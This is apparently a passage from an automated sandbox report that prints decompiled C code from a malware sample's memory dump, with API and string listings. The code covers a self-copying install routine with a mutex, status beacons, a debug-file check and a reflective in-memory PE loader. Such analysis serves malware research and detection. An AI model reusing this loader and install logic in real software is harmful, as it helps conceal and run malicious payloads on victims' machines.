                                                                                                                                                                    				_v312 = 0;
                                                                                                                                                                    				E1000CF20(__edi,  &_v311, 0, 0x103);
                                                                                                                                                                    				GetModuleFileNameA(0,  &_v312, 0x104);
                                                                                                                                                                    				E1001A600(__ebx, _t100, _t101, _t125,  &_v44); // executed
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				_t46 = E10001A50( &_v312, E100011E0( &_v44));
                                                                                                                                                                    				_t108 = _t104 - 0x264 + 0x18;
                                                                                                                                                                    				_t126 = _t46;
                                                                                                                                                                    				if(_t46 == 0) {
                                                                                                                                                                    					_t47 = E1001A0F0("Global\\exist_sign__install_r3");
                                                                                                                                                                    					_t109 = _t108 + 4;
                                                                                                                                                                    					__eflags = _t47;
                                                                                                                                                                    					if(_t47 == 0) {
                                                                                                                                                                    						_v576 = 0;
                                                                                                                                                                    						E1000CF20(_t100,  &_v575, 0, 0x103);
                                                                                                                                                                    						GetTempPathA(0x104,  &_v576);
                                                                                                                                                                    						E1000CD96( &_v576,  &_v576, 0x104, E100011E0( &_v44));
                                                                                                                                                                    						_t111 = _t109 + 0x18;
                                                                                                                                                                    						CopyFileA( &_v312,  &_v576, 0);
                                                                                                                                                                    						_v580 = GetTickCount();
                                                                                                                                                                    						while(1) {
                                                                                                                                                                    							_t56 = E1001A170( &_v312);
                                                                                                                                                                    							_t102 = _t56;
                                                                                                                                                                    							_t57 = E1001A170( &_v576);
                                                                                                                                                                    							_t111 = _t111 + 8;
                                                                                                                                                                    							__eflags = _t56 - _t57;
                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                    								break;
                                                                                                                                                                    							}
                                                                                                                                                                    							Sleep(0x3e8);
                                                                                                                                                                    							__eflags = GetTickCount() - _v580 - 0x7530;
                                                                                                                                                                    							if(__eflags <= 0) {
                                                                                                                                                                    								continue;
                                                                                                                                                                    							} else {
                                                                                                                                                                    							}
                                                                                                                                                                    							break;
                                                                                                                                                                    						}
                                                                                                                                                                    						E1001FDB0();
                                                                                                                                                                    						E1001FF90(_t82, _t100, _t102, __eflags, "install", "user01", "-0.25", "45.0.0", "exe");
                                                                                                                                                                    						_t114 = _t111 + 0x14 - 0x1c;
                                                                                                                                                                    						_t89 = _t114;
                                                                                                                                                                    						_v588 = _t114;
                                                                                                                                                                    						_v612 = E10001160(_t114, __eflags, "status=main_start");
                                                                                                                                                                    						E10020180(_t82, _t100, _t102, __eflags);
                                                                                                                                                                    						_t115 = _t114 + 0x1c;
                                                                                                                                                                    						__eflags = PathFileExistsA("C:\\hijack");
                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                    							L15:
                                                                                                                                                                    							_t116 = _t115 - 0x1c;
                                                                                                                                                                    							_v592 = _t116;
                                                                                                                                                                    							_v616 = E10001160(_t116, __eflags, "status=check_debug");
                                                                                                                                                                    							E10020180(_t82, _t100, _t102, __eflags);
                                                                                                                                                                    							_t118 = _t116 + 0x1c - 0x1c;
                                                                                                                                                                    							_v596 = _t118;
                                                                                                                                                                    							_v620 = E10001160(_t118, __eflags, "user01");
                                                                                                                                                                    							E1001FEA0(_t82, _t100, _t102, __eflags);
                                                                                                                                                                    							_t120 = _t118 + 0x1c - 0x1c;
                                                                                                                                                                    							_v600 = _t120;
                                                                                                                                                                    							_v624 = E10001160(_t120, __eflags, "user01");
                                                                                                                                                                    							E1001FDC0(_t82, _t100, _t102, __eflags);
                                                                                                                                                                    							_v604 = _t120 + 0x1c - 0x1c;
                                                                                                                                                                    							_v628 = E10001160(_t120 + 0x1c - 0x1c, __eflags, "status=main_over");
                                                                                                                                                                    							E10020180(_t82, _t100, _t102, __eflags);
                                                                                                                                                                    						} else {
                                                                                                                                                                    							E1001A0A0();
                                                                                                                                                                    							_t75 = E1001A0B0(_t89);
                                                                                                                                                                    							__eflags = _t75;
                                                                                                                                                                    							if(_t75 == 0) {
                                                                                                                                                                    								L12:
                                                                                                                                                                    							} else {
                                                                                                                                                                    								__eflags = E10019D10();
                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                    									_t77 = E1001FA30(_t82, _t100, _t102, __eflags, 0x3e8, 0);
                                                                                                                                                                    									_t115 = _t115 + 8;
                                                                                                                                                                    									__eflags = _t77;
                                                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                                                    										goto L15;
                                                                                                                                                                    									} else {
                                                                                                                                                                    									}
                                                                                                                                                                    								} else {
                                                                                                                                                                    									goto L12;
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					} else {
                                                                                                                                                                    					}
                                                                                                                                                                    					E1001A260();
                                                                                                                                                                    					_v608 = 1;
                                                                                                                                                                    					_v8 = 0xffffffff;
                                                                                                                                                                    					E100011A0( &_v44);
                                                                                                                                                                    					_t73 = _v608;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					E10020A80(__ebx, _t100, _t101, _t126, "45.0.0"); // executed
                                                                                                                                                                    					_v584 = 1;
                                                                                                                                                                    					_v8 = 0xffffffff;
                                                                                                                                                                    					E100011A0( &_v44);
                                                                                                                                                                    					_t73 = _v584;
                                                                                                                                                                    				}
                                                                                                                                                                    				 *[fs:0x0] = _v16;
                                                                                                                                                                    				return _t73;
                                                                                                                                                                    			}


                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 100204F9
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1002050F
                                                                                                                                                                      • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                                      • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                                      • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileModuleName_memset$_sprintf
                                                                                                                                                                    • String ID: -0.25$45.0.0$45.0.0$C:\hijack$Global\exist_sign__install_r3$exe$install$status=check_debug$status=main_over$status=main_start$user01$user01$user01
                                                                                                                                                                    • API String ID: 3079340674-1842766907
                                                                                                                                                                    • Opcode ID: 223e698365b0860e5aae29af135c91e351df2f6d4b25efb7f7cfea949ec79a0c
                                                                                                                                                                    • Instruction ID: 7a4b6182ef5b3e753845166e3f5bee58e7f320f9ef64b03b030670d1f597adbb
                                                                                                                                                                    • Opcode Fuzzy Hash: 223e698365b0860e5aae29af135c91e351df2f6d4b25efb7f7cfea949ec79a0c
                                                                                                                                                                    • Instruction Fuzzy Hash: 5351A1B5D04318ABEB20EBA4DC4BBDE7775DB50344F500194F90966182EB71BB84CFA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                    			E10019780(void* __ebx, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a36, intOrPtr* _a40, intOrPtr* _a44) {
                                                                                                                                                                    				char _v8;
                                                                                                                                                                    				char _v12;
                                                                                                                                                                    				void* _t45;
                                                                                                                                                                    
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                    				__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12, 0, 0, _a44); // executed
                                                                                                                                                                    				if(GetLastError() == 0x7a) {
                                                                                                                                                                    					 *_a40 = L1000CE56(__ebx, _a44, _t45, __esi,  *_a44);
                                                                                                                                                                    					E1000CF20(_t45,  *_a40, 0,  *_a44);
                                                                                                                                                                    					__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12,  *_a40,  *_a44, 0); // executed
                                                                                                                                                                    					_v8 = 1;
                                                                                                                                                                    				}
                                                                                                                                                                    				return _v8;
                                                                                                                                                                    			}







                                                                                                                                                                    APIs
                                                                                                                                                                    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 100197AC
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 100197B2
                                                                                                                                                                    • _memset.LIBCMT ref: 100197DE
                                                                                                                                                                    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019804
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DevicePropertyRegistrySetup$ErrorLast_memset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 895502402-0
                                                                                                                                                                    • Opcode ID: 6adbbad0e525441aa34f394d1e709c810f69e4a50dd3602c5c2cb0cc2a6a471c
                                                                                                                                                                    • Instruction ID: f8922b701b9361cc18bff0ab125b4374f9cfd65e033693ba824ef8b8be46b605
                                                                                                                                                                    • Opcode Fuzzy Hash: 6adbbad0e525441aa34f394d1e709c810f69e4a50dd3602c5c2cb0cc2a6a471c
                                                                                                                                                                    • Instruction Fuzzy Hash: 8C1193B9610208BBDB04DF98D895FDA77B9AB49304F108259F9099B284D631EA85CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E1001A170(CHAR* _a4) {
                                                                                                                                                                    				struct _WIN32_FIND_DATAA _v324;
                                                                                                                                                                    				intOrPtr _v328;
                                                                                                                                                                    				void* _v332;
                                                                                                                                                                    				void* _t11;
                                                                                                                                                                    
                                                                                                                                                                    				_v328 = 0;
                                                                                                                                                                    				_t11 = FindFirstFileA(_a4,  &_v324); // executed
                                                                                                                                                                    				_v332 = _t11;
                                                                                                                                                                    				if(_v332 != 0xffffffff) {
                                                                                                                                                                    					_v328 = _v324.nFileSizeLow;
                                                                                                                                                                    				}
                                                                                                                                                                    				FindClose(_v332); // executed
                                                                                                                                                                    				return _v328;
                                                                                                                                                                    			}








                                                                                                                                                                    APIs
                                                                                                                                                                    • FindFirstFileA.KERNEL32(1001A679,?), ref: 1001A18E
                                                                                                                                                                    • FindClose.KERNEL32(000000FF), ref: 1001A1B6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                                                    • Opcode ID: 0d0f7e1b90d12563d86b766f37a796064df2748116d1dddbb477bfb1d1da362b
                                                                                                                                                                    • Instruction ID: 097559f34e7186eb2c7e5fd791b7ca3a953ceb1394cb31efbd5b4482c630521c
                                                                                                                                                                    • Opcode Fuzzy Hash: 0d0f7e1b90d12563d86b766f37a796064df2748116d1dddbb477bfb1d1da362b
                                                                                                                                                                    • Instruction Fuzzy Hash: 66F0C974D0022C9BDB70DF64DD88BDDB7B8AB48310F1042D4E91DA32A0DA30AED58F50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                                                    			E1001B620(void* __ebx, void* __edi, void* __esi, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                    				signed short* _v16;
                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                    				_Unknown_base(*)()* _v28;
                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                    				char _v72;
                                                                                                                                                                    				void* _v76;
                                                                                                                                                                    				intOrPtr _v80;
                                                                                                                                                                    				intOrPtr* _v84;
                                                                                                                                                                    				intOrPtr _v88;
                                                                                                                                                                    				intOrPtr _v92;
                                                                                                                                                                    				intOrPtr _v96;
                                                                                                                                                                    				intOrPtr _v100;
                                                                                                                                                                    				void* _t170;
                                                                                                                                                                    				void* _t173;
                                                                                                                                                                    				void* _t182;
                                                                                                                                                                    				intOrPtr _t184;
                                                                                                                                                                    				void* _t194;
                                                                                                                                                                    				void* _t203;
                                                                                                                                                                    				void* _t206;
                                                                                                                                                                    				void* _t207;
                                                                                                                                                                    				void* _t209;
                                                                                                                                                                    				intOrPtr _t220;
                                                                                                                                                                    				intOrPtr _t225;
                                                                                                                                                                    				void* _t239;
                                                                                                                                                                    				intOrPtr _t311;
                                                                                                                                                                    				void* _t326;
                                                                                                                                                                    				void* _t327;
                                                                                                                                                                    				void* _t328;
                                                                                                                                                                    				void* _t329;
                                                                                                                                                                    				void* _t330;
                                                                                                                                                                    				void* _t332;
                                                                                                                                                                    				void* _t333;
                                                                                                                                                                    				void* _t334;
                                                                                                                                                                    				void* _t337;
                                                                                                                                                                    				void* _t338;
                                                                                                                                                                    				void* _t339;
                                                                                                                                                                    
                                                                                                                                                                    				_t327 = __esi;
                                                                                                                                                                    				_t326 = __edi;
                                                                                                                                                                    				_t239 = __ebx;
                                                                                                                                                                    				_v76 = 0;
                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                    				_v28 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetNativeSystemInfo");
                                                                                                                                                                    				_t170 = E1001AE40(_a8, 0x40);
                                                                                                                                                                    				_t329 = _t328 + 8;
                                                                                                                                                                    				if(_t170 != 0) {
                                                                                                                                                                    					_v16 = _a4;
                                                                                                                                                                    					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
                                                                                                                                                                    						_t9 =  &(_v16[0x1e]); // 0xc707ebe8
                                                                                                                                                                    						_t173 = E1001AE40(_a8,  *_t9 + 0xf8);
                                                                                                                                                                    						_t330 = _t329 + 8;
                                                                                                                                                                    						if(_t173 != 0) {
                                                                                                                                                                    							_t13 =  &(_v16[0x1e]); // 0xc707ebe8
                                                                                                                                                                    							_v84 = _a4 +  *_t13;
                                                                                                                                                                    							if( *_v84 == 0x4550) {
                                                                                                                                                                    								if(( *(_v84 + 4) & 0x0000ffff) == 0x14c) {
                                                                                                                                                                    									if(( *(_v84 + 0x38) & 0x00000001) == 0) {
                                                                                                                                                                    										_v88 = _v84 + ( *(_v84 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                    										_v36 =  *(_v84 + 0x38);
                                                                                                                                                                    										_v12 = 0;
                                                                                                                                                                    										while(_v12 < ( *(_v84 + 6) & 0x0000ffff)) {
                                                                                                                                                                    											if( *((intOrPtr*)(_v88 + 0x10)) != 0) {
                                                                                                                                                                    												_v92 =  *((intOrPtr*)(_v88 + 0xc)) +  *((intOrPtr*)(_v88 + 0x10));
                                                                                                                                                                    											} else {
                                                                                                                                                                    												_v92 =  *((intOrPtr*)(_v88 + 0xc)) + _v36;
                                                                                                                                                                    											}
                                                                                                                                                                    											if(_v92 > _v20) {
                                                                                                                                                                    												_v20 = _v92;
                                                                                                                                                                    											}
                                                                                                                                                                    											_v12 = _v12 + 1;
                                                                                                                                                                    											_v88 = _v88 + 0x28;
                                                                                                                                                                    										}
                                                                                                                                                                    										_v28( &_v72);
                                                                                                                                                                    										_v32 = E1001AE80( *((intOrPtr*)(_v84 + 0x50)), _v68);
                                                                                                                                                                    										_t182 = E1001AE80(_v20, _v68);
                                                                                                                                                                    										_t332 = _t330 + 0x10;
                                                                                                                                                                    										if(_v32 == _t182) {
                                                                                                                                                                    											_t184 = _a12( *((intOrPtr*)(_v84 + 0x34)), _v32, 0x3000, 4, _a32);
                                                                                                                                                                    											_t333 = _t332 + 0x14;
                                                                                                                                                                    											_v24 = _t184;
                                                                                                                                                                    											if(_v24 != 0) {
                                                                                                                                                                    												L26:
                                                                                                                                                                    												_v76 = HeapAlloc(GetProcessHeap(), 8, 0x40);
                                                                                                                                                                    												if(_v76 != 0) {
                                                                                                                                                                    													 *((intOrPtr*)(_v76 + 4)) = _v24;
                                                                                                                                                                    													asm("sbb ecx, ecx");
                                                                                                                                                                    													 *(_v76 + 0x14) =  ~( ~( *(_v84 + 0x16) & 0x2000));
                                                                                                                                                                    													 *((intOrPtr*)(_v76 + 0x1c)) = _a12;
                                                                                                                                                                    													 *((intOrPtr*)(_v76 + 0x20)) = _a16;
                                                                                                                                                                    													 *((intOrPtr*)(_v76 + 0x24)) = _a20;
                                                                                                                                                                    													 *((intOrPtr*)(_v76 + 0x28)) = _a24;
                                                                                                                                                                    													 *((intOrPtr*)(_v76 + 0x2c)) = _a28;
                                                                                                                                                                    													 *((intOrPtr*)(_v76 + 0x34)) = _a32;
                                                                                                                                                                    													 *((intOrPtr*)(_v76 + 0x3c)) = _v68;
                                                                                                                                                                    													_t194 = E1001AE40(_a8,  *((intOrPtr*)(_v84 + 0x54)));
                                                                                                                                                                    													_t334 = _t333 + 8;
                                                                                                                                                                    													if(_t194 != 0) {
                                                                                                                                                                    														_v8 = _a12(_v24,  *((intOrPtr*)(_v84 + 0x54)), 0x1000, 4, _a32);
                                                                                                                                                                    														E1000D190(_t239, _t326, _t327, _v8, _v16,  *((intOrPtr*)(_v84 + 0x54)));
                                                                                                                                                                    														_t121 =  &(_v16[0x1e]); // 0xc707ebe8
                                                                                                                                                                    														 *_v76 = _v8 +  *_t121;
                                                                                                                                                                    														 *((intOrPtr*)( *_v76 + 0x34)) = _v24;
                                                                                                                                                                    														_t203 = E1001B300(_t239, _t326, _t327, _a4, _a8, _v84, _v76); // executed
                                                                                                                                                                    														_t337 = _t334 + 0x30;
                                                                                                                                                                    														if(_t203 != 0) {
                                                                                                                                                                    															_t311 =  *((intOrPtr*)( *_v76 + 0x34)) -  *((intOrPtr*)(_v84 + 0x34));
                                                                                                                                                                    															_v80 = _t311;
                                                                                                                                                                    															if(_t311 == 0) {
                                                                                                                                                                    																 *((intOrPtr*)(_v76 + 0x18)) = 1;
                                                                                                                                                                    															} else {
                                                                                                                                                                    																_t220 = E1001B0C0(_v76, _v80);
                                                                                                                                                                    																_t337 = _t337 + 8;
                                                                                                                                                                    																 *((intOrPtr*)(_v76 + 0x18)) = _t220;
                                                                                                                                                                    															}
                                                                                                                                                                    															_t206 = E1001AB60(_v76); // executed
                                                                                                                                                                    															_t338 = _t337 + 4;
                                                                                                                                                                    															if(_t206 != 0) {
                                                                                                                                                                    																_t207 = E1001B490(_v76); // executed
                                                                                                                                                                    																_t339 = _t338 + 4;
                                                                                                                                                                    																if(_t207 != 0) {
                                                                                                                                                                    																	_t209 = E1001AD80(_v76);
                                                                                                                                                                    																	_t339 = _t339 + 4;
                                                                                                                                                                    																	if(_t209 != 0) {
                                                                                                                                                                    																		if( *((intOrPtr*)( *_v76 + 0x28)) == 0) {
                                                                                                                                                                    																			 *((intOrPtr*)(_v76 + 0x38)) = 0;
                                                                                                                                                                    																			L49:
                                                                                                                                                                    																			return _v76;
                                                                                                                                                                    																		}
                                                                                                                                                                    																		if( *(_v76 + 0x14) == 0) {
                                                                                                                                                                    																			 *((intOrPtr*)(_v76 + 0x38)) = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
                                                                                                                                                                    																			L47:
                                                                                                                                                                    																			goto L49;
                                                                                                                                                                    																		}
                                                                                                                                                                    																		_v100 = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
                                                                                                                                                                    																		_v96 = _v100(_v24, 1, 0);
                                                                                                                                                                    																		if(_v96 != 0) {
                                                                                                                                                                    																			 *((intOrPtr*)(_v76 + 0x10)) = 1;
                                                                                                                                                                    																			goto L47;
                                                                                                                                                                    																		}
                                                                                                                                                                    																		SetLastError(0x45a);
                                                                                                                                                                    																		L50:
                                                                                                                                                                    																		E1001A960(_v76);
                                                                                                                                                                    																		return 0;
                                                                                                                                                                    																	}
                                                                                                                                                                    																	goto L50;
                                                                                                                                                                    																}
                                                                                                                                                                    																goto L50;
                                                                                                                                                                    															}
                                                                                                                                                                    															goto L50;
                                                                                                                                                                    														}
                                                                                                                                                                    														goto L50;
                                                                                                                                                                    													}
                                                                                                                                                                    													goto L50;
                                                                                                                                                                    												}
                                                                                                                                                                    												_a16(_v24, 0, 0x8000, _a32);
                                                                                                                                                                    												SetLastError(0xe);
                                                                                                                                                                    												return 0;
                                                                                                                                                                    											}
                                                                                                                                                                    											_t225 = _a12(0, _v32, 0x3000, 4, _a32);
                                                                                                                                                                    											_t333 = _t333 + 0x14;
                                                                                                                                                                    											_v24 = _t225;
                                                                                                                                                                    											if(_v24 != 0) {
                                                                                                                                                                    												goto L26;
                                                                                                                                                                    											}
                                                                                                                                                                    											SetLastError(0xe);
                                                                                                                                                                    											return 0;
                                                                                                                                                                    										}
                                                                                                                                                                    										SetLastError(0xc1);
                                                                                                                                                                    										return 0;
                                                                                                                                                                    									}
                                                                                                                                                                    									SetLastError(0xc1);
                                                                                                                                                                    									return 0;
                                                                                                                                                                    								}
                                                                                                                                                                    								SetLastError(0xc1);
                                                                                                                                                                    								return 0;
                                                                                                                                                                    							}
                                                                                                                                                                    							SetLastError(0xc1);
                                                                                                                                                                    							return 0;
                                                                                                                                                                    						}
                                                                                                                                                                    						return 0;
                                                                                                                                                                    					}
                                                                                                                                                                    					SetLastError(0xc1);
                                                                                                                                                                    					return 0;
                                                                                                                                                                    				}
                                                                                                                                                                    				return 0;
                                                                                                                                                                    			}

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 1001B63E
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1001B645
                                                                                                                                                                      • Part of subcall function 1001AE40: SetLastError.KERNEL32(0000000D,?,1001B659,100207E4,00000040), ref: 1001AE4D
                                                                                                                                                                    • SetLastError.KERNEL32(000000C1), ref: 1001B67F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$AddressHandleModuleProc
                                                                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                    • API String ID: 1762409328-192647395
                                                                                                                                                                    • Opcode ID: e3701e4d903ec74dc5ef954786c854f9baa6ea88c08b49a674e627b22a4b0214
                                                                                                                                                                    • Instruction ID: 948ec142860bc01625bc2ce9e1704a97d6b06a0078abf06e4df2749841334317
                                                                                                                                                                    • Opcode Fuzzy Hash: e3701e4d903ec74dc5ef954786c854f9baa6ea88c08b49a674e627b22a4b0214
                                                                                                                                                                    • Instruction Fuzzy Hash: CAE1E5B4E00609DFDB04CF94C885AAEBBB5FF88304F648558E905AF395D774E982CB91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                    			E1000E90E() {
                                                                                                                                                                    				int _t13;
                                                                                                                                                                    				long _t19;
                                                                                                                                                                    				signed int _t20;
                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                    				signed int _t22;
                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                    				signed int _t27;
                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                    				signed int _t32;
                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                    				void* _t37;
                                                                                                                                                                    				long _t39;
                                                                                                                                                                    				void* _t40;
                                                                                                                                                                    				signed int _t47;
                                                                                                                                                                    				struct _OSVERSIONINFOA* _t49;
                                                                                                                                                                    				void* _t51;
                                                                                                                                                                    
                                                                                                                                                                    				_t37 = GetProcessHeap;
                                                                                                                                                                    				_t49 = HeapAlloc(GetProcessHeap(), 0, 0x94);
                                                                                                                                                                    				if(_t49 != 0) {
                                                                                                                                                                    					_t49->dwOSVersionInfoSize = 0x94;
                                                                                                                                                                    					_t13 = GetVersionExA(_t49);
                                                                                                                                                                    					__eflags = _t13;
                                                                                                                                                                    					_push(_t49);
                                                                                                                                                                    					_push(0);
                                                                                                                                                                    					if(_t13 != 0) {
                                                                                                                                                                    						 *(_t51 + 0xc) = _t49->dwPlatformId;
                                                                                                                                                                    						 *(_t51 + 0x10) = _t49->dwMajorVersion;
                                                                                                                                                                    						 *(_t51 - 4) = _t49->dwMinorVersion;
                                                                                                                                                                    						_t47 = _t49->dwBuildNumber & 0x00007fff;
                                                                                                                                                                    						HeapFree(GetProcessHeap(), ??, ??);
                                                                                                                                                                    						_t19 =  *(_t51 + 0xc);
                                                                                                                                                                    						__eflags = _t19 - 2;
                                                                                                                                                                    						if(_t19 != 2) {
                                                                                                                                                                    							_t47 = _t47 | 0x00008000;
                                                                                                                                                                    							__eflags = _t47;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t39 =  *(_t51 - 4);
                                                                                                                                                                    						 *0x1033347c = _t19;
                                                                                                                                                                    						_t20 =  *(_t51 + 0x10);
                                                                                                                                                                    						_t44 = (_t20 << 8) + _t39;
                                                                                                                                                                    						 *0x10333484 = (_t20 << 8) + _t39;
                                                                                                                                                                    						 *0x10333488 = _t20;
                                                                                                                                                                    						 *0x1033348c = _t39;
                                                                                                                                                                    						 *0x10333480 = _t47;
                                                                                                                                                                    						_t21 = E1000F7BF(1);
                                                                                                                                                                    						__eflags = _t21;
                                                                                                                                                                    						_pop(_t40);
                                                                                                                                                                    						if(_t21 == 0) {
                                                                                                                                                                    							goto L1;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_t23 = E100133E0(_t37);
                                                                                                                                                                    							__eflags = _t23;
                                                                                                                                                                    							if(_t23 != 0) {
                                                                                                                                                                    								E10015081();
                                                                                                                                                                    								 *0x10336f64 = GetCommandLineA();
                                                                                                                                                                    								 *0x103332fc = E10014F4C(); // executed
                                                                                                                                                                    								_t27 = E10014994(_t37, _t44, _t47, _t49, __eflags); // executed
                                                                                                                                                                    								__eflags = _t27;
                                                                                                                                                                    								if(_t27 >= 0) {
                                                                                                                                                                    									_t28 = E10014E93(_t40);
                                                                                                                                                                    									__eflags = _t28;
                                                                                                                                                                    									if(_t28 < 0) {
                                                                                                                                                                    										L15:
                                                                                                                                                                    										E10014BD4();
                                                                                                                                                                    										goto L10;
                                                                                                                                                                    									} else {
                                                                                                                                                                    										_t32 = E10014C20(_t40, _t44);
                                                                                                                                                                    										__eflags = _t32;
                                                                                                                                                                    										if(_t32 < 0) {
                                                                                                                                                                    											goto L15;
                                                                                                                                                                    										} else {
                                                                                                                                                                    											_t33 = E1001167A(_t37, _t47, _t49, _t51, 0);
                                                                                                                                                                    											__eflags = _t33;
                                                                                                                                                                    											if(_t33 != 0) {
                                                                                                                                                                    												goto L15;
                                                                                                                                                                    											} else {
                                                                                                                                                                    												 *0x103332f8 =  *0x103332f8 + 1;
                                                                                                                                                                    												_t22 = 1;
                                                                                                                                                                    												__eflags = 1;
                                                                                                                                                                    											}
                                                                                                                                                                    										}
                                                                                                                                                                    									}
                                                                                                                                                                    								} else {
                                                                                                                                                                    									L10:
                                                                                                                                                                    									E100130CA();
                                                                                                                                                                    									goto L8;
                                                                                                                                                                    								}
                                                                                                                                                                    							} else {
                                                                                                                                                                    								L8:
                                                                                                                                                                    								E1000F819();
                                                                                                                                                                    								goto L1;
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					} else {
                                                                                                                                                                    						HeapFree(GetProcessHeap(), ??, ??);
                                                                                                                                                                    						goto L1;
                                                                                                                                                                    					}
                                                                                                                                                                    				} else {
